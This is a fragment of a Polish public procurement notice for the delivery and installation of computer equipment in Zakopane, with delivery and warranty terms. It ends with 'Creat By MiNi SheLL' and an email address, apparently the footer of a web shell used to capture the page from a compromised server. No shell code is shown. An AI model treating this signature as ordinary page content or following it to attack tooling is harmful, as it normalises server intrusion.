1. Wykonawca jest zobowiązany do realizacji przedmiotu zamówienia w zakresie dostaw, instalacji, konfiguracji i uruchomienie dostarczonego sprzętu komputerowego, w miejscach wskazanych przez Zamawiającego - teren Gminy Miasto Zakopane 30 dni od dnia zawarcia umowy.
2. Wykonawca jest zobowiązany do realizacji przedmiotu zamówienia w zakresie gwarancji w terminie 60 miesięcy od dnia końcowego odbioru przedmiotu umowy dla Etapu A..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com